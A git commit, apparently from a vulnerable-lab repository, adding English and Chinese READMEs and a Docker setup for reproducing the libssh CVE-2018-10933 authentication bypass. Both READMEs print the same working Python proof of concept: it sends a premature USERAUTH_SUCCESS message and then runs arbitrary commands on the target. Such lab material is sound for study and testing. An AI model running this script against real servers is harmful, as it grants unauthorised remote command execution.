first commit

libssh/CVE-2018-10933/README.md

@@ -0,0 +1,81 @@
+# libssh Authentication Bypass Vulnerability(CVE-2018-10933)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+libssh is a multiplatform C library implementing the SSHv2 protocol on client and server side. A logic vulnerability was found in libssh's server-side state machine. The attacker can send the `MSG_USERAUTH_SUCCESS` message before the authentication succeed. That can bypass the authentication and access the target SSH server.
+
+References:
+
+- https://www.libssh.org/security/advisories/CVE-2018-10933.txt
+- https://www.seebug.org/vuldb/ssvid-97614
+
+## Setup
+
+Start the environment:
+
+```
+docker compose up -d
+```
+
+After the environment is started, we can connect the `your-ip:2222` port (account password: `myuser:mypassword`), which is a legal ssh login:
+
+![](1.png)
+
+## Exploit
+
+Referring to the POC given in https://www.seebug.org/vuldb/ssvid-97614, we can use the following script to proof the vulnerability.
+
+```python
+#!/usr/bin/env python3
+import sys
+import paramiko
+import socket
+import logging
+
+logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
+bufsize = 2048
+
+
+def execute(hostname, port, command):
+    sock = socket.socket()
+    try:
+        sock.connect((hostname, int(port)))
+
+        message = paramiko.message.Message()
+        transport = paramiko.transport.Transport(sock)
+        transport.start_client()
+
+        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
+        transport._send_message(message)
+
+        client = transport.open_session(timeout=10)
+        client.exec_command(command)
+
+        # stdin = client.makefile("wb", bufsize)
+        stdout = client.makefile("rb", bufsize)
+        stderr = client.makefile_stderr("rb", bufsize)
+
+        output = stdout.read()
+        error = stderr.read()
+
+        stdout.close()
+        stderr.close()
+
+        return (output+error).decode()
+    except paramiko.SSHException as e:
+        logging.exception(e)
+        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
+    except socket.error:
+        logging.debug("Unable to connect.")
+
+    return None
+
+
+if __name__ == '__main__':
+    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))
+
+```
+
+You can execute arbitrary commands on the target server like following:
+
+![](2.png)

libssh/CVE-2018-10933/README.zh-cn.md

@@ -0,0 +1,79 @@
+# libssh 服务端权限认证绕过漏洞（CVE-2018-10933）
+
+libssh是一个提供ssh相关接口的开源库，包含服务端、客户端等。其服务端代码中存在一处逻辑错误，攻击者可以在认证成功前发送`MSG_USERAUTH_SUCCESS`消息，绕过认证过程，未授权访问目标SSH服务器。
+
+参考资料：
+
+- https://www.libssh.org/security/advisories/CVE-2018-10933.txt
+- https://www.seebug.org/vuldb/ssvid-97614
+
+## 漏洞环境
+
+执行如下命令启动存在漏洞的环境：
+
+```
+docker compose up -d
+```
+
+环境启动后，我们可以连接`your-ip:2222`端口（账号密码：`myuser:mypassword`），这是一个合法的ssh流程：
+
+![](1.png)
+
+## 漏洞复现
+
+参考 https://www.seebug.org/vuldb/ssvid-97614 中给出的POC，我们编写一个简单的漏洞复现脚本：
+
+```python
+#!/usr/bin/env python3
+import sys
+import paramiko
+import socket
+import logging
+
+logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
+bufsize = 2048
+
+
+def execute(hostname, port, command):
+    sock = socket.socket()
+    try:
+        sock.connect((hostname, int(port)))
+
+        message = paramiko.message.Message()
+        transport = paramiko.transport.Transport(sock)
+        transport.start_client()
+
+        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
+        transport._send_message(message)
+
+        client = transport.open_session(timeout=10)
+        client.exec_command(command)
+
+        # stdin = client.makefile("wb", bufsize)
+        stdout = client.makefile("rb", bufsize)
+        stderr = client.makefile_stderr("rb", bufsize)
+
+        output = stdout.read()
+        error = stderr.read()
+
+        stdout.close()
+        stderr.close()
+
+        return (output+error).decode()
+    except paramiko.SSHException as e:
+        logging.exception(e)
+        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
+    except socket.error:
+        logging.debug("Unable to connect.")
+
+    return None
+
+
+if __name__ == '__main__':
+    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))
+
+```
+
+使用python3执行，即可在目标服务器上执行任意命令：
+
+![](2.png)

libssh/CVE-2018-10933/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+ sshd:
+   image: vulhub/libssh:0.8.1
+   ports:
+    - "2222:22"